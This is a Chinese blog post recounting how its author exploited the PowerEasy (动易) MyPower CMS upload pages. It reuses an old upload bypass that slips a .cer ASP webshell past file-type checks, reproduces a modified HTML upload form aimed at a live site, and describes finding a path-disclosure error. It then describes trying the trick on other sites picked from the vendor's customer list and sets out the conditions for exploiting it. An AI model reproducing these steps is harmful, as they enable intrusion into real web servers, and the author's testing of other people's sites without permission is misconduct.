爆出动易程序的物理路径

最新推荐文章于 2022-03-15 16:30:00 发布

kxlzx

最新推荐文章于 2022-03-15 16:30:00 发布

阅读量1.3k

点赞数

分类专栏： 5我的原创文章标签： input microsoft vbscript asp class file

本文链接：https://blog.csdn.net/kxlzx/article/details/184951

版权

5我的原创专栏收录该内容

4 篇文章 0 订阅

订阅专栏

爆出动易程序的物理路径
大家还记得动易MY Power Ver 3.51的那个上传cer文件的漏洞吧？那可是n年以前的一个杰作，一定都用它入侵了不少站点了。他利用的就是用
<INPUT class=tx1 type=file size=30 name=FileName> <INPUT class=tx1 type=file size=30 name=FileName1>
这两句来提交，结果第一个FileName提交的合法文件通过了验证，第二个FileName1竟然绕过了这个验证，之所以可以上传cer，不能上传asp，是因为asp还有验证。关键就是用那两句话绕了过去。（提示：cer文件和asp文件在iis中默认用同一个解释器来解释，就是说相对于用户，服务器怎么执行asp，就怎么执行cer。上传的扩展名为cer的asp木马，一样可以正常使用）
说实话，我有时候喜欢把MY Power和FreePower弄混，虽然有区别，但是我总以为是版本不一样，闹笑话了。我用MY Power Ver 3.51用来上传cer文件的漏洞利用程序（就是那个更改后的htm文件）把地址改为FreePower的upfile_softpic.asp。地址为www.******.com/editor/upfile_softpic.asp。却出现了“频道参数丢失！”这个错误。我当时以为是版本不一样，所以提交的数据也不一样。
在本地用winsock监听数据包，利用asp的空字节漏洞（nc提交用ultraedit修改后的数据）提交之后仍然错误。我想：“这也不行，那个提交cer的也不行，等等！提交cer的不是不行，是版本不一样，那么我也许可以在这个版本上修改“提交上传文件”这个文件的源代码，然后本地提交呢？”
查看http://www.******/editor/upload_article.asp?ChannelID=1源代码
<form action="upfile_article.asp" method="post" name="form1" onSubmit="return check()" enctype="multipart/form-data">
//改上句action="upfile_article.asp"为http://www.******/editor/upfile_article.asp
<input name="FileName" type="FILE" class="tx1" size="20">
<input name="FileName" type="FILE" class="tx1" size="20">（另加一行）
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
<input name="ImgWidth" type="hidden" id="ImgWidth">
<input name="ImgHeight" type="hidden" id="ImgHeight">
<input name="AlignType" type="hidden" id="AlignType">
<input name="ChannelID" type="hidden" id="ChannelID" value="1">
</form>
大家仔细看看有什么不妥？不错，按漏洞的使用方法，我应该另加的一行为<input name="FileName1" type="FILE" class="tx1" size="20">，但是我粗心大意，忘记了。然后选择了两个文件，前一个是gif，后一个是cer，按照开始提到的规矩来，点上传。
出现错误！但是这个错误好像很好玩，竟然给出了站点的物理路径！
Microsoft VBScript 运行时错误错误 '800a01c9'

此键已与该集合的一个元素关联

D:/WWWROOT/BIZ******1/WWWROOT/EDITOR/../inc/upfile_class.asp，行 104
我没有因为入侵成功而高兴，反而因为出错了让我激动了一会儿！这个爆出物理路径的错误以前就没有人提到，莫非发现了好东西？赶快到动易主站查看他的客户名单，随便捞了几个站出来，在管理员登陆叶面看看版本，Powered by: MyPower 4.0。然后执行上面的操作，竟然同样爆出了物理路径。这样还是不放心，又去找个几个使用Powered by: MyPower 4.0的黑客安全网站（他们是搞安全的，如果是个已经发现的漏洞，应该会不存在的）。我找的几个都给出了物理路径！激动ing！（难道传说中的黑客都是这样发现新漏洞的？）
于是总结了漏洞的使用条件
1 版本Powered by: MyPower 4.0
2 要登陆后留下Cookies（意思就是可以注册并登陆）
3 inc/upfile_class.asp和upfile_article.asp存在，经测试，凡调用inc/upfile_class.asp的几个文件upfile_article.asp, upfile_softpic.asp等等都可以成功！
4 服务器没有屏蔽Microsoft VBScript 运行时错误的提示信息。（比如华夏的用这种方法会出现“处理 URL 时服务器出错。请与系统管理员联系。”）
利用过程就是上面提到的了。

空虚浪子心

kxlzx

关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
1
评论
爆出动易程序的物理路径

爆出动易程序的物理路径大家还记得动易MY Power Ver 3.51的那个上传cer文件的漏洞吧？那可是n年以前的一个杰作，一定都用它入侵了不少站点了。他利用的就是用这两句来提交，结果第一个FileName提交的合法文件通过了验证，第二个FileName1竟然绕过了这个验证，之所以可以上传cer，不能上传asp，是因为asp还有验证。关键就是用那两句话绕了过去。（提示：cer文件和asp文件在
复制链接

扫一扫